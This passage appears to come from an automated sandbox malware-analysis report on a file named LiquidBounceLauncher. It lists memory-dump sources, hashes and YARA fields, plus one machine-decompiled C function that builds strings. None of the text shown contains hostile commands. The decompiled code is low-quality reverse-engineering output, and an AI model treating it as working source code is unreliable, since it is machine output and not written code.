                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 4cf044b2d7dd0ea96e6e2d3def7215889a5738d7d170ca20fb917c8d50bf2c39
                                                                                                                                                                                      • Instruction ID: 7c5aa32352646b64d6f73e84c640e744ea3e3a8694c29763aed1031b79acb95d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cf044b2d7dd0ea96e6e2d3def7215889a5738d7d170ca20fb917c8d50bf2c39
                                                                                                                                                                                      • Instruction Fuzzy Hash: 61210433B043251B97049C6EB8D015BF6C7ABD8264F99813FE94CC3756ECB1DC6A8685
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00438496 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 5720cf781c6dc41bcb59285346d357f2095d90e75b7be7db5c84349e3c187d03
                                                                                                                                                                                      • Instruction ID: a36f2d59ece26be9a32f76a0b7e46a46a0c8d2f6772ff79a5ad5142b02e80c75
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5720cf781c6dc41bcb59285346d357f2095d90e75b7be7db5c84349e3c187d03
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21A0B5E047199FCB04EF69D48459EFBF4AF88310F00852EE898A7311D738D9058B96
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0043612A Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: abort
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4206212132-0
                                                                                                                                                                                      • Opcode ID: 658d762ebbcfa733d9e1be312706b8f8a8cdb15b738c517442f25f0ff6e3182d
                                                                                                                                                                                      • Instruction ID: 15e23f09cccca18227c2196ef28aa6021dbfbb90f9adaca52765e2aa05272b90
                                                                                                                                                                                      • Opcode Fuzzy Hash: 658d762ebbcfa733d9e1be312706b8f8a8cdb15b738c517442f25f0ff6e3182d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FF062B8A062028FC348DF14D194825FBB1BF99310B56E1AEE8494B356CB31E890CF99
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004D234C Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
                                                                                                                                                                                      • Instruction ID: 6652cff7d8440b16a8351d97089879d19be56641f6db35fcb8a13aa305481701
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
                                                                                                                                                                                      • Instruction Fuzzy Hash: 55E0DF322105109BCB219A2ACA00C87F7E8EBA57B07094427ED4993721C278FC01C794
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00430760 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 941210db7bb1189c2e25644bf339fbac65d7dfff36c842c25ff09c36dff01b9c
                                                                                                                                                                                      • Instruction ID: 5e5db359bfeef8052dab6c2abc979a3eeb06c9a23cce21fc92533d93bc4af6cc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 941210db7bb1189c2e25644bf339fbac65d7dfff36c842c25ff09c36dff01b9c
                                                                                                                                                                                      • Instruction Fuzzy Hash: AEC012B0C042408AC200BF38810A229BAB0AF62208F8828ACE58013207E739C11C86AF
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00432250 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 113fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • terminate called after throwing an instance of ', xrefs: 00432355
                                                                                                                                                                                      • -, xrefs: 00432453
                                                                                                                                                                                      • terminate called recursively, xrefs: 004323C9
                                                                                                                                                                                      • not enough space for format expansion (Please submit full bug report at http://gcc.gnu.org/bugs.html): , xrefs: 00432261
                                                                                                                                                                                      • terminate called without an active exception, xrefs: 00432463
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: fwrite$abortfputs$freememcpy
                                                                                                                                                                                      • String ID: -$not enough space for format expansion (Please submit full bug report at http://gcc.gnu.org/bugs.html): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                                                                                                                                                                                      • API String ID: 1748391741-837261893
                                                                                                                                                                                      • Opcode ID: 094f68353c043ea7bfd24b184331105cf9c5d913eb038009a0b24f98a48a25ca
                                                                                                                                                                                      • Instruction ID: e53539429f657185f5f0a5c4b5ca92b5d8cf841fda635e28ef19b8fd13e65233
                                                                                                                                                                                      • Opcode Fuzzy Hash: 094f68353c043ea7bfd24b184331105cf9c5d913eb038009a0b24f98a48a25ca
                                                                                                                                                                                      • Instruction Fuzzy Hash: 374128B1508704AFD710AF25D48575BBBF0AF85358F40C92EE8984B342E77D94888F96
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0043A7B0 Relevance: 19.9, APIs: 11, Strings: 2, Instructions: 366stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      C-Code - Quality: 24%
                                                                                                                                                                                      			E0043A7B0(intOrPtr* __ecx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v16;
				void* _v20;
				char _v32;
				intOrPtr _v36;
				char* _v40;
				int _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				void* _v68;
				void* _v84;
				void* _v88;
				void* _v92;
				void* _v108;
				int _v112;
				void* _v116;
				int _v128;
				int _v132;
				char* _v136;
				char* _v140;
				void* _v152;
				void* _v164;
				void* _v176;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t142;
				char _t145;
				int _t149;
				char _t151;
				int _t152;
				char** _t154;
				int _t155;
				int _t158;
				int _t164;
				char** _t166;
				int _t167;
				intOrPtr _t169;
				intOrPtr _t171;
				int _t175;
				intOrPtr _t177;
				intOrPtr _t179;
				char** _t181;
				int _t182;
				intOrPtr _t184;
				intOrPtr _t186;
				int _t191;
				intOrPtr _t194;
				int _t200;
				intOrPtr _t203;
				char** _t207;
				int _t208;
				intOrPtr _t211;
				char* _t218;
				char* _t224;
				signed int _t225;
				char* _t226;
				char* _t227;
				char* _t228;
				char* _t229;
				char* _t230;
				char* _t233;
				intOrPtr* _t234;
				char* _t236;
				char* _t243;
				char* _t252;
				void* _t255;
				void* _t258;
				intOrPtr _t259;
				intOrPtr _t262;
				intOrPtr _t265;
				char* _t268;
				char* _t269;
				char* _t270;
				int* _t271;
				char* _t272;
				intOrPtr _t273;
				char* _t274;
				char* _t275;
				char* _t276;
				char* _t277;
				char* _t278;
				char* _t279;
				intOrPtr* _t280;
				intOrPtr* _t281;
				void* _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				void* _t288;
				void* _t289;
				void* _t295;
				void* _t296;
				void* _t297;

				_t142 = __ecx + 8;
				_t282 = _t284;
				_t280 = __ecx;
				_t285 = _t284 - 0x2c;
				 *__ecx = _t142;
				_v36 = _t142;
				 *((char*)(__ecx + 8)) = 0;
				 *(__ecx + 4) = 0;
				_t269 =  *( *_a4 + 0x10);
				_t145 =  *_t269;
				_v40 = _t145;
				if(_t145 == 0) {
					_v48 = 0x2a;
					_v52 = 1;
					_v56 = 0;
					_v60 = 0;
					E0049C600(1, __ecx, _t269, __ecx, _t282);
					goto L23;
				} else {
					if(_t269[4] == 0) {
						L22:
						_t270 = _v40;
						_t149 = strlen(_t270);
						_v52 = _t270;
						_v48 = _t149;
						_v56 = 0;
						_v60 = 0;
						L0049BCB0(1, _t280, _t270, _t280, _t282);
						L23:
						return _t280;
					} else {
						_t233 = _v40;
						while(1) {
							_t151 = _t269[4];
							_v60 = _t233;
							_v56 = _t151;
							_v32 = _t151;
							_t152 = strcmp(??, ??);
							_t233 = _v32;
							if(1 > 4) {
								break;
							}
							if(_t152 == 0) {
								continue;
							}
							break;
						}
						if(_t152 == 0) {
							goto L22;
						} else {
							_v60 = 0x80;
							_t234 = _t280;
							L0049DCE0(_t234);
							_t154 =  *0x4d9f54; // 0x4d9ec0
							_t288 = _t285 - 4;
							_t224 =  *_t154;
							_v64 = _t224;
							_t155 = strlen(??);
							if(_t155 > 0x7fffffff -  *(_t280 + 4)) {
								L35:
								_v60 = "basic_string::append";
								L004A9AF0();
								goto L36;
							} else {
								_v56 = _t155;
								_v60 = _t224;
								_t234 = _t280;
								L0049DE80(_t234);
								_t288 = _t288 - 8;
								_t194 =  *_t280;
								_t230 =  *(_t280 + 4);
								_t269 =  &(_t230[1]);
								if(_v36 == _t194) {
									_t259 = 0xf;
								} else {
									_t259 =  *((intOrPtr*)(_t280 + 8));
								}
								if(_t269 > _t259) {
									_v48 = 1;
									_v52 = 0;
									_t234 = _t280;
									_v56 = 0;
									_v60 = _t230;
									E0049E050(_t234, _t259);
									_t288 = _t288 - 0x10;
									_t194 =  *_t280;
								}
								 *((char*)(_t194 + _t230)) = 0x3d;
								 *(_t280 + 4) = _t269;
								 *((char*)( *_t280 +  &(_t230[1]))) = 0;
								_t224 =  *( *( *_a4 + 0x10));
								_t200 = strlen(_t224);
								if(_t200 > 0x7fffffff -  *(_t280 + 4)) {
									L36:
									_v60 = "basic_string::append";
									L004A9AF0();
									0;
									_push(_t282);
									_t283 = _t288;
									_push(_t269);
									_push(_t280);
									_push(_t224);
									_t281 = _t234;
									_t289 = _t288 - 0x3c;
									 *_t234 = 0x4d3cdc;
									_t271 =  *( *_v56 + 0x10);
									_t158 =  *_t271;
									_v112 = _t158;
									if(_t158 == 0) {
										 *((intOrPtr*)(_t289 + 0xc)) = 0x2a;
										_v128 = 1;
										_v136 = 0;
										_v132 =  *0x4d3cd0;
										E00477230(_t234, _t283);
										goto L53;
									} else {
										if(_t271[1] == 0) {
											L54:
											_t272 = _v56;
											_v136 = _t272;
											L0042F460();
											_v136 = _t272;
											_v132 = _t158;
											L00477CC0(_t281);
											return _t281;
										} else {
											_t236 = _v56;
											_t225 = 0;
											while(1) {
												_t225 = _t225 + 1;
												_t164 = _t271[_t225];
												_v136 = _t236;
												_v132 = _t164;
												_v52 = _t164;
												_t158 = strcmp(??, ??);
												_t236 = _v52;
												if(_t225 > 4) {
													break;
												}
												if(_t158 == 0) {
													continue;
												}
												break;
											}
											if(_t158 == 0) {
												goto L54;
											} else {
												_v136 = 0x80;
												E00478950(_t281);
												_t166 =  *0x4d9f54; // 0x4d9ec0
												_t226 =  *_t166;
												_v140 = _t226;
												_t167 = strlen(??);
												_v140 = _t226;
												_v136 = _t167;
												E00477980(_t281);
												_t169 =  *_t281;
												_t295 = _t289 - 0xfffffffffffffffc;
												_t273 =  *((intOrPtr*)(_t169 - 0xc));
												_t227 = _t273 + 1;
												if(_t227 <=  *((intOrPtr*)(_t169 - 8))) {
													if( *((intOrPtr*)(_t169 - 4)) > 0) {
														goto L43;
													} else {
														goto L44;
													}
													L53:
													return _t281;
													goto L65;
												} else {
													L43:
													_v136 = _t227;
													E00478950(_t281);
													_t169 =  *_t281;
													_t295 = _t295 - 4;
												}
												L44:
												 *((char*)(_t169 +  *((intOrPtr*)(_t169 - 0xc)))) = 0x3d;
												_t171 =  *_t281;
												_t94 = _t171 - 0xc; // -12
												if(_t94 != 0x4d3cd0) {
													 *(_t171 - 4) = 0;
													 *((intOrPtr*)(_t171 - 0xc)) = _t227;
													 *((char*)(_t171 + _t273 + 1)) = 0;
												}
												_t228 =  *( *( *_v0 + 0x10));
												_t175 = strlen(_t228);
												_v136 = _t228;
												_v132 = _t175;
												E00477980(_t281);
												_t296 = _t295 - 8;
												_t229 = 4;
												do {
													_t177 =  *_t281;
													_t252 =  *((intOrPtr*)(_t177 - 0xc));
													_t274 = _t252 + 1;
													_v52 = _t252;
													if(_t274 <=  *((intOrPtr*)(_t177 - 8))) {
														if( *((intOrPtr*)(_t177 - 4)) > 0) {
															goto L47;
														} else {
															goto L48;
														}
														goto L53;
													} else {
														L47:
														_v136 = _t274;
														E00478950(_t281);
														_t177 =  *_t281;
														_t296 = _t296 - 4;
													}
													L48:
													 *((char*)(_t177 +  *((intOrPtr*)(_t177 - 0xc)))) = 0x3b;
													_t179 =  *_t281;
													_t104 = _t179 - 0xc; // -12
													_t255 = _t104;
													if(_t255 != 0x4d3cd0) {
														 *(_t179 - 4) = 0;
														 *((intOrPtr*)(_t179 - 0xc)) = _t274;
														 *((char*)(_t255 +  &(_v52[0xd]))) = 0;
													}
													_t181 =  *0x4d9f54; // 0x4d9ec0
													_t275 =  *(_t181 + _t229);
													_t182 = strlen(_t275);
													_v136 = _t275;
													_v132 = _t182;
													E00477980(_t281);
													_t184 =  *_t281;
													_t297 = _t296 - 8;
													_t243 =  *((intOrPtr*)(_t184 - 0xc));
													_t276 = _t243 + 1;
													_v52 = _t243;
													if(_t276 <=  *((intOrPtr*)(_t184 - 8))) {
														if( *((intOrPtr*)(_t184 - 4)) > 0) {
															goto L50;
														} else {
															goto L51;
														}
														goto L65;
													} else {
														L50:
														_v136 = _t276;
														E00478950(_t281);
														_t184 =  *_t281;
														_t297 = _t297 - 4;
													}
													L51:
													 *((char*)(_t184 +  *((intOrPtr*)(_t184 - 0xc)))) = 0x3d;
													_t186 =  *_t281;
													_t113 = _t186 - 0xc; // -12
													_t258 = _t113;
													if(_t258 != 0x4d3cd0) {
														 *(_t186 - 4) = 0;
														 *((intOrPtr*)(_t186 - 0xc)) = _t276;
														 *((char*)(_t258 +  &(_v52[0xd]))) = 0;
													}
													_t277 =  *( *( *_v0 + 0x10) + _t229);
													_t191 = strlen(_t277);
													_v136 = _t277;
													_v132 = _t191;
													E00477980(_t281);
													_t229 =  &(_t229[4]);
													_t296 = _t297 - 8;
												} while (_t229 != 0x18);
												goto L53;
											}
										}
									}
								} else {
									_v56 = _t200;
									_v60 = _t224;
									_t234 = _t280;
									L0049DE80(_t234);
									_t288 = _t288 - 8;
									_t224 = 4;
									while(1) {
										_t278 =  *(_t280 + 4);
										_v32 =  &(_t278[1]);
										_t203 =  *_t280;
										if(_v36 == _t203) {
											_t262 = 0xf;
										} else {
											_t262 =  *((intOrPtr*)(_t280 + 8));
										}
										if(_v32 > _t262) {
											_v48 = 1;
											_v52 = 0;
											_t234 = _t280;
											_v56 = 0;
											_v60 = _t278;
											E0049E050(_t234, _t262);
											_t288 = _t288 - 0x10;
											_t203 =  *_t280;
										}
										 *((char*)(_t203 + _t278)) = 0x3b;
										 *(_t280 + 4) =  &(_t278[1]);
										 *((char*)( *_t280 +  &(_t278[1]))) = 0;
										_t207 =  *0x4d9f54; // 0x4d9ec0
										_t269 =  *(_t207 + _t224);
										_t208 = strlen(_t269);
										if(_t208 > 0x7fffffff -  *(_t280 + 4)) {
											break;
										}
										_v56 = _t208;
										_v60 = _t269;
										_t234 = _t280;
										L0049DE80(_t234);
										_t279 =  *(_t280 + 4);
										_t288 = _t288 - 8;
										_v32 =  &(_t279[1]);
										_t211 =  *_t280;
										if(_v36 == _t211) {
											_t265 = 0xf;
										} else {
											_t265 =  *((intOrPtr*)(_t280 + 8));
										}
										if(_v32 > _t265) {
											_v48 = 1;
											_v52 = 0;
											_t234 = _t280;
											_v56 = 0;
											_v60 = _t279;
											E0049E050(_t234, _t265);
											_t288 = _t288 - 0x10;
											_t211 =  *_t280;
										}
										 *((char*)(_t211 + _t279)) = 0x3d;
										 *(_t280 + 4) =  &(_t279[1]);
										 *((char*)( *_t280 +  &(_t279[1]))) = 0;
										_t269 = ( *( *_a4 + 0x10))[_t224];
										_t218 = strlen(_t269);
										if(_t218 > 0x7fffffff -  *(_t280 + 4)) {
											_v60 = "basic_string::append";
											L004A9AF0();
											_t268 =  *_t280;
											_t224 = _t218;
											if(_v36 != _t268) {
												_v60 = _t268;
												L004AF8C0();
											}
											L00422F20(_t218, _t224, _t268, _t269, _t280, _t224);
											break;
										} else {
											_v56 = _t218;
											_v60 = _t269;
											_t234 = _t280;
											L0049DE80(_t234);
											_t224 =  &(_t224[4]);
											_t288 = _t288 - 8;
											if(_t224 != 0x18) {
												continue;
											} else {
												return _t280;
											}
										}
										goto L65;
									}
									_v60 = "basic_string::append";
									L004A9AF0();
									goto L35;
								}
							}
						}
					}
				}
				L65:
			}




































































































                                                                                                                                                                                      0x0043a7b1
                                                                                                                                                                                      0x0043a7b4
                                                                                                                                                                                      0x0043a7b9
                                                                                                                                                                                      0x0043a7bb
                                                                                                                                                                                      0x0043a7be
                                                                                                                                                                                      0x0043a7c0
                                                                                                                                                                                      0x0043a7c6
                                                                                                                                                                                      0x0043a7ca
                                                                                                                                                                                      0x0043a7d3
                                                                                                                                                                                      0x0043a7d6
                                                                                                                                                                                      0x0043a7da
                                                                                                                                                                                      0x0043a7dd
                                                                                                                                                                                      0x0043aa96
                                                                                                                                                                                      0x0043aa9e
                                                                                                                                                                                      0x0043aaa6
                                                                                                                                                                                      0x0043aaae
                                                                                                                                                                                      0x0043aab5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043a7e3
                                                                                                                                                                                      0x0043a7e8
                                                                                                                                                                                      0x0043a9a0
                                                                                                                                                                                      0x0043a9a0
                                                                                                                                                                                      0x0043a9a6
                                                                                                                                                                                      0x0043a9ab
                                                                                                                                                                                      0x0043a9af
                                                                                                                                                                                      0x0043a9b5
                                                                                                                                                                                      0x0043a9bd
                                                                                                                                                                                      0x0043a9c4
                                                                                                                                                                                      0x0043a9c9
                                                                                                                                                                                      0x0043a9d5
                                                                                                                                                                                      0x0043a7ee
                                                                                                                                                                                      0x0043a7ee
                                                                                                                                                                                      0x0043a7f9
                                                                                                                                                                                      0x0043a7fc
                                                                                                                                                                                      0x0043a7ff
                                                                                                                                                                                      0x0043a802
                                                                                                                                                                                      0x0043a806
                                                                                                                                                                                      0x0043a809
                                                                                                                                                                                      0x0043a811
                                                                                                                                                                                      0x0043a814
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043a7f7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043a7f7
                                                                                                                                                                                      0x0043a818
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043a81e
                                                                                                                                                                                      0x0043a81e
                                                                                                                                                                                      0x0043a825
                                                                                                                                                                                      0x0043a827
                                                                                                                                                                                      0x0043a82c
                                                                                                                                                                                      0x0043a831
                                                                                                                                                                                      0x0043a834
                                                                                                                                                                                      0x0043a836
                                                                                                                                                                                      0x0043a839
                                                                                                                                                                                      0x0043a848
                                                                                                                                                                                      0x0043aaf0
                                                                                                                                                                                      0x0043aaf0
                                                                                                                                                                                      0x0043aaf7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043a84e
                                                                                                                                                                                      0x0043a84e
                                                                                                                                                                                      0x0043a852
                                                                                                                                                                                      0x0043a855
                                                                                                                                                                                      0x0043a857
                                                                                                                                                                                      0x0043a85c
                                                                                                                                                                                      0x0043a85f
                                                                                                                                                                                      0x0043a864
                                                                                                                                                                                      0x0043a867
                                                                                                                                                                                      0x0043a86a
                                                                                                                                                                                      0x0043aa8c
                                                                                                                                                                                      0x0043a870
                                                                                                                                                                                      0x0043a870
                                                                                                                                                                                      0x0043a870
                                                                                                                                                                                      0x0043a875
                                                                                                                                                                                      0x0043aa60
                                                                                                                                                                                      0x0043aa68
                                                                                                                                                                                      0x0043aa70
                                                                                                                                                                                      0x0043aa72
                                                                                                                                                                                      0x0043aa7a
                                                                                                                                                                                      0x0043aa7d
                                                                                                                                                                                      0x0043aa82
                                                                                                                                                                                      0x0043aa85
                                                                                                                                                                                      0x0043aa85
                                                                                                                                                                                      0x0043a87b
                                                                                                                                                                                      0x0043a881
                                                                                                                                                                                      0x0043a884
                                                                                                                                                                                      0x0043a891
                                                                                                                                                                                      0x0043a896
                                                                                                                                                                                      0x0043a8a5
                                                                                                                                                                                      0x0043aafc
                                                                                                                                                                                      0x0043aafc
                                                                                                                                                                                      0x0043ab03
                                                                                                                                                                                      0x0043ab0e
                                                                                                                                                                                      0x0043ab10
                                                                                                                                                                                      0x0043ab11
                                                                                                                                                                                      0x0043ab13
                                                                                                                                                                                      0x0043ab14
                                                                                                                                                                                      0x0043ab15
                                                                                                                                                                                      0x0043ab16
                                                                                                                                                                                      0x0043ab18
                                                                                                                                                                                      0x0043ab1e
                                                                                                                                                                                      0x0043ab26
                                                                                                                                                                                      0x0043ab29
                                                                                                                                                                                      0x0043ab2d
                                                                                                                                                                                      0x0043ab30
                                                                                                                                                                                      0x0043ad85
                                                                                                                                                                                      0x0043ad8d
                                                                                                                                                                                      0x0043ad95
                                                                                                                                                                                      0x0043ad9c
                                                                                                                                                                                      0x0043ada0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043ab36
                                                                                                                                                                                      0x0043ab3b
                                                                                                                                                                                      0x0043ace0
                                                                                                                                                                                      0x0043ace0
                                                                                                                                                                                      0x0043ace3
                                                                                                                                                                                      0x0043ace6
                                                                                                                                                                                      0x0043aceb
                                                                                                                                                                                      0x0043acee
                                                                                                                                                                                      0x0043acf4
                                                                                                                                                                                      0x0043ad05
                                                                                                                                                                                      0x0043ab41
                                                                                                                                                                                      0x0043ab41
                                                                                                                                                                                      0x0043ab44
                                                                                                                                                                                      0x0043ab54
                                                                                                                                                                                      0x0043ab54
                                                                                                                                                                                      0x0043ab57
                                                                                                                                                                                      0x0043ab5a
                                                                                                                                                                                      0x0043ab5d
                                                                                                                                                                                      0x0043ab61
                                                                                                                                                                                      0x0043ab64
                                                                                                                                                                                      0x0043ab6c
                                                                                                                                                                                      0x0043ab6f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043ab52
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0043ab52
                                                                                                                                                                                      0x0043ab73
                                                                                                                                                                                      0x00000000
